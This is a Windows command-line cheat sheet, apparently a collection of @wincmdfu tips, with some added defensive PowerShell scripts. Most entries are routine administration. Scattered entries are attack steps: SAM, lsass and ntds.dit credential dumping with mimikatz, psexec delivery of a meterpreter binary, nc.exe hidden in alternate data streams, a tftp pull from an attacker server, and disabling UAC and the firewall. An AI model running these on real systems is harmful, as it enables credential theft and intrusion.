@wincmdfu
Windows CLI gems. Tweets of Windows one-line commands that make life easier, shortcuts and command line fu.
Table of Contents
- Get entries from IPv4 neighbor cache
- Get available wireless networks via cmd and netsh
- Quick list IP addresses only
- List ALL services AND their binaries
- Export SAM from the Windows Registry to a file
- Enable remote desktop using reg
- Enable the boot log to see list of drivers loaded during startup
- Powershell cmdlet to create System Restore Point
- Check the current account for seDebugPrivilege
- Enable/disable system users via command line
- View process that is consuming the most memory using powershell
- Create an Alternate Data Stream from a file on an NTFS partition
- Export running processes in CSV format
- Lock Windows desktop using command line
- Start explorer with a file or folder selected/highlighted
- Dump VirtualBox image containing RAM and ELF headers
- Set Time Zone of the system clock
- Make folder inside a guest from the host
- Force copy meterpreter binary to remote machines & run as system
- Create n/w share called Apps, with read access & limit to 10 conns
- List all the drives under My Computer using fsutil
- Troubleshoot n/w packet drops with router statistics using pathping
- List unsigned dlls for a specific process. For system wide list
- Obtain a list of Windows XP computers on the domain using PS
- Open the System Properties window, with the Advanced tab selected
- Using the dir command to find Alternate Data Streams
- Use procdump to obtain the lsass process memory
- Run mimikatz in minidump mode & use mini.dmp from procdump
- Get list of startup programs using wmic
- Add a binary to an Alternate Data Stream
- Execute a binary Alternate Data Stream Win 7/2008 using wmic
- Show config & state info for Network Access Protection enabled client
- Get computer system information, including domain name and memory, using wmic
- Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
- Secure delete a file/folder in Windows
- Show all startup entries while hiding Microsoft entries. CSV output
- Download files via commandline using PS
- Fetch the last 10 entries from the Windows Security event log, in text format
- Create a dll that runs calc on invoke
- Run a command as another user
- Get shutdown/reboot events from the last 1000 log entries using PS
- Create a new snapshot of the volume that has the AD database and log files
- Mount the snapshot
- Run a process on a remote system using wmic
- List the machines, with usernames, that were connected via RDP
- List all process that are running on your system by remote users connected via RDP
- Reset the Windows TCP\IP stack
- List logged on users
- Set a static IP on a remote box
- Bypass powershell execution policy restrictions
- List running processes every second on a remote box
- Get a list of running processes and their command line arguments on a remote system
- Remotely enable and start the Volume Shadow Copy Service
- Ping multiple IPs from ips.txt & see live hosts
- Set global proxy in Windows to point to IE proxy
- Enumerate list of drivers with complete path information
- View Group Policy Objects that have been applied to a system
- Reset the WMI repository to what it was when the OS was installed
- Create symbolic links in Windows Vista, 7 & higher
- Enable the tftp client in Vista & higher
- Obtain list of firewall rules on a local system
- Get name of current domain controller
- Look at content cached in kernel mode on IIS 7 and higher
- Quick test to check MS15_034
- Get a list of all open Named pipes via Powershell
- Possible VENOM detection on VirtualBox
- List RDP sessions on local or remote in list format
- Get a list of service packs & hotfixes using wmic for remote systems listed in file
- Export wireless connection profiles
- Unzip using PowerShell
- Open the Network & Sharing center
- Remotely stop/start ftp on several systems
- To quickly find large files using cmd
- Print RDP connections
- List scheduled tasks & binaries
- Display the "Stored User names and Passwords" window
- List namespaces & classes in WMI via PowerShell
- Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
- Change file extensions recursively
- List IPs of running VirtualBox machines
- Windows Privilege Escalation
- Enumerate packages with their oem inf filenames
- Install a driver package using inf file
- Malware Hunting with Mark Russinovich and the Sysinternals
- Windows Nano Server APIs
- Windows wifi hotspot using cmd
- Disable UAC via cmdline
- Turn off Windows firewall for all profiles
- List Missing Updates
- Export SAM and SYSTEM. Dump password hashes offline
- Convert Binary to base64 string to transfer across restricted RDP
- Convert Base64 string to Binary
- List services running as SYSTEM and possibly weak file permissions
- Check Bitlocker status on a remote box
- Export failed logon attempts
- Alternate Data Streams and PS
- Run the Windows Assessment tool for cpu and ram and disk
- Port forward (proxy) traffic to remote host and port
- Enable/Disable NetBIOS over TCP/IP
- Compact multiple VDI files across folders
- Full scan using WinDefender
- Generate 32 char random password
Get entries from IPv4 neighbor cache
C:\>netsh interface ipv4 show neighbors
Get available wireless networks via cmd and netsh
C:\>netsh wlan show networks mode=b
Quick list IP addresses only
Save the following as ip.bat somewhere in %PATH%, then call ip from the CLI:
ipconfig | find /I "pv"
List ALL services AND their binaries
for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
Export SAM from the Windows Registry to a file
C:\>reg save HKLM\SAM "%temp%\SAM.reg"
Needs an elevated prompt. Whatever the extension, the output is a binary hive file, not a .reg text export.
Enable remote desktop using reg
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If the firewall is on, the "Remote Desktop" rule group must also be enabled, and accounts outside Administrators need to be in the Remote Desktop Users group.
Enable the boot log to see list of drivers loaded during startup
bcdedit /set bootlog yes
The log is written to %windir%\ntbtlog.txt on the next boot
Powershell cmdlet to create System Restore Point
PS C:\>Checkpoint-Computer -description "Restore point!"
Check the current account for SeDebugPrivilege
C:\> whoami /priv | findstr "Debug"
For all privs:
C:\> whoami /priv
Enable/disable system users via command line
C:\>net user test /active:yes
Use /active:no to disable the account.
Get full help on the net user command:
C:\>net help user
View process that is consuming the most memory using powershell
PS C:\> (Get-Process | Sort-Object -Descending WS)[0]
Create an Alternate Data Stream from a file on an NTFS partition
C:\>type data.txt > C:\windows\explorer.exe:newads.txt
You need write access to the host file. Binaries under %windir% are owned by TrustedInstaller, so even an elevated prompt may need to pick another host file.
Export running processes in CSV format
C:\> tasklist /FO CSV > tasks.txt
Lock Windows desktop using command line
C:\> rundll32 user32.dll,LockWorkStation
Start explorer with a file or folder selected/highlighted
C:\> explorer /select,C:\MyData\sample.docx
Dump VirtualBox image containing RAM and ELF headers
C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf
Set Time Zone of the system clock
C:\> tzutil /s "Eastern Standard Time"
List available Time zones:
C:\> tzutil /l
Make folder inside a guest from the host (VirtualBox)
C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"
Requires the Guest Additions to be installed in the guest.
Force copy meterpreter binary to remote machines & run as system
C:\> psexec @ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe
@ips.txt takes one host per line; -c copies the binary, -f overwrites an existing copy, -s runs it as SYSTEM.
Create n/w share called Apps, with read access & limit to 10 conns
C:\> net share Apps=C:\Apps /G:everyone,READ /US:10
List all the drives under My Computer using fsutil
C:\> fsutil.exe fsinfo drives
Troubleshoot n/w packet drops with router statistics using pathping
C:\> pathping -n www.google.com
List unsigned dlls for a specific process.
For system wide list, remove the process name
C:\> listdlls -u explorer.exe
Obtain a list of Windows XP computers on the domain using PS
Needs the ActiveDirectory PowerShell module (RSAT, or Server 2008 R2 and later):
PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}
Open the System Properties window, with the Advanced tab selected
Change the number for different tabs
C:\> control sysdm.cpl,,3
Using the dir command to find Alternate Data Streams
C:\> dir /R | find ":$D"
Using Sysinternals streams (shows the path):
C:\> streams -s .
Use procdump to obtain the lsass process memory. Use mimikatz minidump to get passwords
C:\> procdump -accepteula -ma lsass.exe mini.dmp
procdump needs SeDebugPrivilege (an elevated prompt) to open lsass.
Run mimikatz in minidump mode & use mini.dmp from procdump
mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords
Use the mimikatz build with the same architecture (x86/x64) as the dumped lsass, and ideally run it on the same OS build, or the minidump will not parse.
Get list of startup programs using wmic
C:\> wmic startup list full
Add a binary to an Alternate Data Stream
C:\> type c:\tools\nc.exe > c:\nice.png:nc.exe
Execute it (XP/2K3):
C:\> start c:\nice.png:nc.exe
Execute a binary Alternate Data Stream Win 7/2008 using wmic
C:\> wmic process call create C:\nice.png:nc.exe
Show config & state info for Network Access Protection enabled client
https://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx
C:\> netsh nap client show configuration
Get computer system information, including domain name and memory, using wmic
C:\> wmic computersystem list /format:csv
Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
C:\> pkgmgr /iu:"TelnetClient"
Secure delete a file/folder in Windows
Sysinternals
C:\> sdelete -p 10 a.txt
To recursively delete folders (-s recurses into subdirectories; -r only clears the read-only attribute):
C:\> sdelete -p 10 -s C:\data\
Show all startup entries while hiding Microsoft entries. CSV output
Covers more locations than the built-in Windows tools
C:\> autorunsc -m -c
Download files via commandline using PS
PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
Fetch the last 10 entries from the Windows Security event log, in text format
C:\> wevtutil qe Security /c:10 /f:Text
The default output format is XML
Create a dll that runs calc on invoke
msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll
C:\> rundll32.exe rcalc.dll,1
msfpayload and msfencode have been retired from Metasploit; on current versions msfvenom -p windows/exec CMD=calc.exe -f dll -o rcalc.dll produces the same dll.
Run a command as another user
You will be prompted for password
C:\> runas /noprofile /user:domain\username "mmc wf.msc"
Get shutdown/reboot events from the last 1000 log entries using PS
Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *
Create a new snapshot of the volume that has the AD database and log files
C:\> ntdsutil sn "ac i ntds" create quit quit
Mount the snapshot
Copy ntds.dit from the snapshot and save the SYSTEM hive from the registry; together they give the password hashes offline
C:\> ntdsutil snapshot "list all" "mount 1" quit quit
Run a process on a remote system using wmic
C:\> wmic /node:ip process call create "net user dum dum /add"
List the machines, with usernames, that were connected via RDP
C:\> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
List all processes that are running on your system for remote users connected via RDP
C:\> query process *
Reset the Windows TCP/IP stack
netsh int ip reset c:\tcpresetlog.txt
List logged on users.
Shows inbound SMB sessions (client computer and user name). Very useful during a pentest to spot domain admins connecting to the box
C:\> net session | find "\\"
Set a static IP on a remote box
C:\> wmic /node:remotebox nicconfig where Index=1 call EnableStatic ("192.168.1.4"), ("255.255.255.0")
Bypass powershell execution policy restrictions
PS C:\> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1
Execution policy is not a security boundary; the switch only sets the Process scope of the new process. If Group Policy sets the machine or user policy, that scope takes precedence and the switch is ignored.
List running processes every second on a remote box
C:\> wmic /node:target process list brief /every:1
Remove /node:target for localhost
Get a list of running processes and their command line arguments on a remote system
C:\> wmic /node:target process get commandline, name
Remotely enable and start the Volume Shadow Copy Service
C:\> sc \\target config vss start= auto
C:\> sc \\target start vss
Ping multiple IPs from ips.txt & see live hosts
C:\>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="
Set global proxy in Windows to point to IE proxy
C:\> netsh winhttp import proxy source=ie
Enumerate list of drivers with complete path information
C:\> driverquery /FO list /v
View Group Policy Objects that have been applied to a system
Very useful during pentests
C:\> gpresult /z /h outputfile.html
Reset the WMI repository to what it was when the OS was installed
Very helpful if you have a corrupt repo
C:\> winmgmt /resetrepository
Create symbolic links in Windows Vista, 7 & higher
C:\> mklink <link> <target>
C:\> mklink D:\newlink.txt E:\thisexists.txt
Enable the tftp client in Vista & higher
C:\> ocsetup TFTP /quiet
Pull files to a compromised server
:
C:\> tftp -i attacksrv get bin.exe
Obtain list of firewall rules on a local system
C:\> netsh advfi fi sh rule name=all
(netsh accepts abbreviations; this is netsh advfirewall firewall show rule name=all)
Can be combined with wmic for remote systems
Get name of current domain controller
C:\> set log
(prints LOGONSERVER, the DC that authenticated the current session)
C:\> nltest /dcname:DOMAIN
Get list of all DCs:
C:\> nltest /dclist:DOMAIN
Look at content cached in kernel mode on IIS 7 and higher
C:\> netsh http sh ca
Useful when investigating the MS15-034 HTTP.sys vuln
Quick test to check MS15_034
The check relies on an upper bound that overflows a 64-bit length, so the full value must be sent:
C:\> curl -v -H "Range: bytes=0-18446744073709551615" "http://host/a.png" -o a.png
HTTP 416 (Requested Range Not Satisfiable) = Vulnerable
HTTP 400 (Bad Request, "The request has an invalid header name") = Patched
A 200 means the Range header was ignored (e.g. the server is not HTTP.sys) and tells you nothing.
Get a list of all open Named pipes via Powershell
PS C:\> [System.IO.Directory]::GetFiles("\\.\pipe\")
Possible VENOM detection on VirtualBox
C:\> vboxmanage list -l vms > a.txt
Search 'Storage' & 'Floppy'. VENOM (CVE-2015-3456) is in the virtual floppy controller, so VMs with a floppy controller attached are the ones to look at.
List RDP sessions on local or remote in list format
PS C:\> qwinsta /server:<host> | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv
Drop /server:<host> for the local box. Note that collapsing whitespace shifts the columns for rows with an empty SESSIONNAME or USERNAME (disconnected sessions, listeners).
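The whitespace-to-CSV trick above breaks as soon as a column is empty. The following is an added example (not from the original page): it parses qwinsta output by the column offsets of the header line instead, so blank fields stay in their place, and it runs against a constructed sample built with the same fixed widths as real output. It assumes English column headers; the Get-RdpSessions wrapper and its /server: handling are this example's, not part of the page.

```powershell
# Added example: parse qwinsta by header column positions (assumes English headers)
function ConvertFrom-Qwinsta {
    param([Parameter(Mandatory)][string[]]$Lines)

    $header = $Lines | Where-Object { $_ -match 'SESSIONNAME' } | Select-Object -First 1
    if (-not $header) { throw 'No qwinsta header line found (localized output?)' }

    # Column starts come from the header. ID is right-aligned, so its field
    # runs from the USERNAME start up to the end of the "ID" label.
    $cSess   = $header.IndexOf('SESSIONNAME')
    $cUser   = $header.IndexOf('USERNAME')
    $cIdEnd  = $header.IndexOf(' ID ') + 3
    $cState  = $header.IndexOf('STATE')
    $cType   = $header.IndexOf('TYPE')
    $cDevice = $header.IndexOf('DEVICE')

    # Substring that tolerates lines shorter than the requested range
    $col = {
        param($s, $from, $to)
        if ($from -ge $s.Length) { return '' }
        if ($null -eq $to -or $to -gt $s.Length) { $to = $s.Length }
        $s.Substring($from, $to - $from).Trim()
    }

    foreach ($line in $Lines) {
        if ($line -eq $header -or -not $line.Trim()) { continue }
        $userAndId = & $col $line $cUser $cIdEnd
        # Every session row ends this field with the numeric session ID
        if ($userAndId -match '^(?<user>.*?)\s*(?<id>\d+)$') {
            [pscustomobject]@{
                Current     = ($line[0] -eq '>')      # marker for the session running qwinsta
                SessionName = & $col $line $cSess $cUser
                UserName    = $Matches.user
                Id          = [int]$Matches.id
                State       = & $col $line $cState $cType
                Type        = & $col $line $cType $cDevice
                Device      = & $col $line $cDevice $null
            }
        }
    }
}

# Hypothetical wrapper: omit -Server for the local machine
function Get-RdpSessions {
    param([string]$Server)
    $qargs = @()
    if ($Server) { $qargs += "/server:$Server" }
    ConvertFrom-Qwinsta -Lines (& qwinsta.exe @qargs 2>&1 | ForEach-Object { "$_" })
}

# Constructed sample: same fixed widths as real qwinsta output
$sample = @(' ' + 'SESSIONNAME'.PadRight(18) + 'USERNAME'.PadRight(22) + '   ID' + '  ' + 'STATE'.PadRight(8) + 'TYPE'.PadRight(12) + 'DEVICE')
$fmt = '{0}{1,-18}{2,-22}{3,5}  {4,-8}{5}'
$sample += $fmt -f ' ', 'services',  '',      0,     'Disc',   ''
$sample += $fmt -f '>', 'console',   'alice', 1,     'Active', ''
$sample += $fmt -f ' ', 'rdp-tcp#3', 'bob',   2,     'Active', 'rdpwd'
$sample += $fmt -f ' ', '',          'carol', 3,     'Disc',   ''
$sample += $fmt -f ' ', 'rdp-tcp',   '',      65536, 'Listen', ''

# Interactive sessions only: drop the listener (ID 65536) and the services session
ConvertFrom-Qwinsta -Lines $sample |
    Where-Object { $_.UserName -and $_.Id -lt 65536 } |
    Format-Table -AutoSize
```

In the sample, carol's disconnected session has no SESSIONNAME at all; the CSV one-liner would have reported "carol" as the session name and "3" as the user, while the column parser keeps the fields straight.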
Get a list of service packs & hotfixes using wmic for remote systems listed in file
C:\> wmic /node:@file /output:out.txt qfe list full
Export wireless connection profiles
C:\> netsh wlan export profile key=clear
key=clear writes the pre-shared key into the XML in plain text; leave it off to keep the key encrypted. Add folder=<path> to choose where the XML files go.
Unzip using PowerShell
PS C:\> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory("<src.zip>","<destdir>")
Open the Network & Sharing center
control.exe /name Microsoft.NetworkandSharingCenter
Create a shortcut of this as ns in PATH for ease
Remotely stop/start ftp on several systems
C:\> wmic /node:@ips.txt /user:u /password:p process call create "net start msftpsvc"
Use "net stop msftpsvc" to stop it.
To quickly find large files using cmd
C:\> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"
Run from the directory you want to search; sizes are in bytes
Print RDP connections
for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"
List scheduled tasks & binaries
C:\> schtasks /query /fo LIST /v
Weak permissions on a task's binary or its directory can be exploited for local privilege escalation
Display the "Stored User names and Passwords" window
C:\> rundll32 keymgr.dll,KRShowKeyMgr
List namespaces & classes in WMI via PowerShell
PS C:\> gwmi -n root -cl __Namespace | Select name
PS C:\> gwmi -n root\cimv2 -li
Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
C:\> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK
Change file extensions recursively
e.g. csv to xls
C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"
List IPs of running VirtualBox machines
for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"
Only guests with the Guest Additions installed publish these properties.
Windows Privilege Escalation
Enumerate packages with their oem inf filenames
C:\> pnputil -e
Install a driver package using inf file
C:\> pnputil -i -a path_to_inf
Malware Hunting with Mark Russinovich and the Sysinternals
Windows Nano Server APIs
https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx
Windows wifi hotspot using cmd
Starting a wifi hotspot using Windows cmd with ssid name hotspotname and key password
Disable UAC via cmdline
C:\> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f
Turn off Windows firewall for all profiles
Useful if you have a bind shell
C:\> netsh advfirewall set allprofiles state off
List Missing Updates
PS C:\> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title
Export SAM and SYSTEM. Dump password hashes offline
C:\>reg save HKLM\SAM SAM
C:\>reg save HKLM\SYSTEM SYSTEM
Needs an elevated prompt. The SYSTEM hive holds the boot key that decrypts the hashes in SAM, so both are required.
Convert Binary to base64 string to transfer across restricted RDP
PS C:\> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))
Convert Base64 string to Binary
PS C:\> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By
-Encoding Byte exists only in Windows PowerShell (5.1 and earlier); PowerShell 7 replaced it with -AsByteStream. For anything larger than a few hundred KB, [IO.File]::ReadAllBytes / WriteAllBytes are far faster than Get-Content/Set-Content. Compare a hash on both ends after the transfer.
List services running as SYSTEM and possibly weak file permissions
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
The findstr filters out binaries under \Windows and \Program Files, leaving third-party service paths, which are the ones most likely to have writable binaries or directories. wmic is deprecated on current Windows; Get-CimInstance Win32_Service returns the same data.
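Listing the services is only the first step; the actual check is whether a low-privileged principal can write the binary (or its directory, or a path prefix of an unquoted path). The following is an added example, not from the original page: it enumerates LocalSystem services with Get-CimInstance, extracts the real binary from PathName (handling quoted paths and unquoted paths with spaces), and reports Allow ACEs that give Everyone, Users, Authenticated Users or INTERACTIVE any write-class right. The principal list, the rights mask and the function names are this example's own choices; extend the list for your environment.

```powershell
# Added example: find LocalSystem services whose binary or directory a low-privileged user can modify
function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }         # quoted: take what is inside the quotes
    $acc = ''
    foreach ($t in ($PathName.Trim() -split '\s+')) {                    # unquoted: grow until the token ends in .exe
        $acc = if ($acc) { "$acc $t" } else { $t }
        if ($acc -match '\.exe$') { return $acc }
    }
    return ($PathName.Trim() -split '\s+')[0]                             # no .exe at all: first token
}

# Rights that let a principal alter the file: WriteData, AppendData, Delete, WriteDAC,
# WriteOwner, GENERIC_WRITE, GENERIC_ALL. Modify and FullControl include these bits.
$script:WriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000
$script:WeakPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

function Get-WeakWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($script:WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # FileSystemRights is an int-backed flags enum; generic rights show up as raw bits
        if (([int]$ace.FileSystemRights) -band $script:WriteMask) {
            "$($ace.IdentityReference.Value) ($($ace.FileSystemRights))"
        }
    }
}

function Find-WeakSystemServices {
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $svc = $_
            $bin = Get-ServiceBinaryPath $svc.PathName
            $findings = @()
            $findings += Get-WeakWriteAce $bin | ForEach-Object { "binary writable by $_" }
            $findings += Get-WeakWriteAce (Split-Path $bin -Parent) | ForEach-Object { "directory writable by $_" }
            if ($svc.PathName -notmatch '^\s*"' -and $bin -match ' ') {
                $findings += 'unquoted path with spaces'   # C:\Program.exe, C:\Program Files\Foo.exe, ... get tried first
            }
            if ($findings) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    Binary    = $bin
                    Findings  = ($findings -join '; ')
                }
            }
        }
}

# Path extraction on a constructed unquoted-with-spaces PathName
Get-ServiceBinaryPath 'C:\Program Files\Foo Bar\svc.exe -k net'
# Live check; run as the low-privileged user whose view of the ACLs matters
Find-WeakSystemServices | Format-Table -AutoSize -Wrap
```

Run it as the unprivileged user you are assessing rather than as an administrator: Get-Acl needs read access to the object, and the interesting answer is what that user can reach. An Auto-start service with a writable binary is the classic SYSTEM escalation on the next reboot; a writable directory is almost as good because of DLL search order.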
Check Bitlocker status on a remote box
manage-bde -status -cn <box>
Use wmic /node:@ips.txt with the process alias for multiple boxes.
Export failed logon attempts
PS C:\> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv
Failed logons are event ID 4625 (4771 for Kerberos pre-authentication failures on a DC); filtering on FailureAudit also exports every other audit failure. Reading the Security log needs an elevated prompt, and Get-EventLog only exists in Windows PowerShell.
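A CSV of raw failures is rarely what you act on; the useful view is failures grouped by source address, with the number of distinct accounts tried. The following is an added example, not from the original page: it reads 4625 events with Get-WinEvent (which works in both Windows PowerShell and PowerShell 7), flattens the EventData fields, and then labels each source as brute force (many attempts on few accounts) or password spray (few attempts on many accounts). The thresholds, the SubStatus interpretation and the sample records are this example's own; the records are constructed, not exported from a real log.

```powershell
# Added example: summarize 4625 failures per source address
function ConvertFrom-Event4625 {
    param([Parameter(Mandatory, ValueFromPipeline)]
          [System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    process {
        $x = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            User      = $d['TargetUserName']
            Domain    = $d['TargetDomainName']
            Source    = $d['IpAddress']
            LogonType = [int]$d['LogonType']        # 3 = network (SMB etc.), 10 = RDP
            SubStatus = $d['SubStatus']             # 0xC0000064 = no such user, 0xC000006A = bad password
        }
    }
}

function Get-FailedLogons {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    # Needs an elevated prompt to read the Security log
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $Since } -ErrorAction Stop |
        ConvertFrom-Event4625
}

function Get-LogonFailureSummary {
    param([Parameter(Mandatory)][object[]]$Records, [int]$MinAttempts = 10, [int]$MinUsers = 5)
    $Records | Group-Object Source | ForEach-Object {
        $g = $_
        $users   = @($g.Group | Select-Object -ExpandProperty User -Unique)
        $unknown = @($g.Group | Where-Object { $_.SubStatus -eq '0xC0000064' }).Count
        $verdict = if ($users.Count -ge $MinUsers)    { 'password spray' }
                   elseif ($g.Count -ge $MinAttempts) { 'brute force' }
                   else                               { 'noise' }
        [pscustomobject]@{
            Source        = $g.Name
            Attempts      = $g.Count
            DistinctUsers = $users.Count
            UnknownUsers  = $unknown                  # many unknown names = user enumeration
            LogonTypes    = (($g.Group.LogonType | Sort-Object -Unique) -join ',')
            Verdict       = $verdict
        }
    } | Sort-Object Attempts -Descending
}

# Constructed sample records in the shape ConvertFrom-Event4625 produces
$now = Get-Date
$sample = @()
1..12 | ForEach-Object {
    $sample += [pscustomobject]@{ Time = $now.AddMinutes(-$_); User = 'administrator'; Domain = 'CORP'; Source = '10.0.0.5'; LogonType = 3; SubStatus = '0xC000006A' }
}
'alice', 'bob', 'carol', 'dave', 'erin', 'frank' | ForEach-Object {
    $sample += [pscustomobject]@{ Time = $now; User = $_; Domain = 'CORP'; Source = '10.0.0.9'; LogonType = 10; SubStatus = '0xC000006A' }
}
$sample += [pscustomobject]@{ Time = $now; User = 'svc_backup'; Domain = 'CORP'; Source = '10.0.0.7'; LogonType = 3; SubStatus = '0xC0000064' }

Get-LogonFailureSummary -Records $sample | Format-Table -AutoSize
# Against the live log: Get-LogonFailureSummary -Records (Get-FailedLogons) | Export-Csv log.csv -NoTypeInformation
```

On the sample, 10.0.0.5 comes out as brute force (12 attempts, one account), 10.0.0.9 as password spray (six accounts, one attempt each, over RDP) and 10.0.0.7 as noise. On a domain controller run the same grouping over 4771 as well, since Kerberos failures never produce 4625 there.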
Alternate Data Streams and PS
(aliases: gi = Get-Item, gc = Get-Content, sc = Set-Content, ri = Remove-Item; spell them out in scripts)
- List all ADS for all files in current dir
PS C:\> gi * -s *
- Read ADS
PS C:\> gc <file> -s <ADSName>
- Create ADS using text input
PS C:\> sc <file> -s <ADSName>
- Delete ADS
PS C:\> ri <file> -s <ADSName>
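Put together, the dir /R, streams and Get-Item -Stream entries above let you list streams; what a responder actually wants is a sweep that flags the streams worth opening. The following is an added example, not from the original page: it walks a tree, lists every named stream except the main :$DATA, reads the first two bytes of each and flags "MZ", the PE signature, which is what the nice.png:nc.exe trick above leaves behind. Zone.Identifier (the mark-of-the-web stream on downloads) is skipped unless asked for. The demo directory under %TEMP% and its files are constructed for the example.

```powershell
# Added example: sweep a tree for alternate data streams that start with a PE header
function Read-StreamHead {
    param([string]$Path, [string]$Stream, [int]$Count = 2)
    # -Encoding Byte exists only in Windows PowerShell 5.1; PowerShell 7 uses -AsByteStream
    $bytes = if ($PSVersionTable.PSVersion.Major -ge 6) {
        Get-Content -LiteralPath $Path -Stream $Stream -AsByteStream -TotalCount $Count -ErrorAction SilentlyContinue
    } else {
        Get-Content -LiteralPath $Path -Stream $Stream -Encoding Byte -TotalCount $Count -ErrorAction SilentlyContinue
    }
    $arr = [byte[]]@()
    if ($bytes) { $arr = [byte[]]@($bytes) }
    return ,$arr
}

function Find-SuspiciousAds {
    param([string]$Root = '.', [switch]$IncludeZoneIdentifier)
    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' -and ($IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier') } |
            ForEach-Object {
                $head = Read-StreamHead -Path $file.FullName -Stream $_.Stream
                [pscustomobject]@{
                    File        = $file.FullName
                    Stream      = $_.Stream
                    Bytes       = $_.Length
                    LooksLikePE = ($head.Length -ge 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)   # "MZ"
                }
            }
    }
}

# Constructed demo: one harmless named stream and one that starts with "MZ"
$dir = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$f = Join-Path $dir 'report.txt'
Set-Content -LiteralPath $f -Value 'quarterly numbers'
Set-Content -LiteralPath $f -Stream 'notes'   -Value 'reviewer comments'
Set-Content -LiteralPath $f -Stream 'payload' -Value 'MZ marker only, not a real binary' -NoNewline

Find-SuspiciousAds -Root $dir | Format-Table -AutoSize
Remove-Item -LiteralPath $dir -Recurse -Force
```

In the demo the 'payload' stream is reported with LooksLikePE true and 'notes' with false. Streams live on NTFS only, so copying a file to FAT/exFAT or a network share that does not preserve streams silently drops them, which is also why a triage copy of a suspect file should be taken with a tool that keeps them.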
Run the Windows Assessment tool for cpu and ram and disk
C:\> winsat cpuformal -v
C:\> winsat memformal -v
C:\> winsat diskformal -v
Port forward (proxy) traffic to remote host and port
C:\> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]
(netsh interface portproxy; the positional order is listenport, connectaddress, connectport, listenaddress. portproxy needs IPv6 enabled on the box even for v4tov4.)
Enable/Disable NetBIOS over TCP/IP
Step 1. Get Index of Network Adapter:
C:\> wmic nicconfig get caption,index
Step 2. Use the index (0 = default/DHCP setting, 1 = enable, 2 = disable):
C:\> wmic nicconfig where index=1 call SetTcpipNetbios 1
Compact multiple VDI files across folders
C:\> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i
Full scan using WinDefender
C:\>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2
Use wmic /node:@ips process call create for multiple boxes.
Generate 32 char random password
Save as genpass.ps1
PS C:\> ([char[]](38..126)|sort{Get-Random})[0..31] -join ''
(0..32 would give 33 characters.) This shuffles the alphabet with Get-Random, which is not a cryptographic RNG, so it is fine for throwaway lab passwords but not for anything that matters.
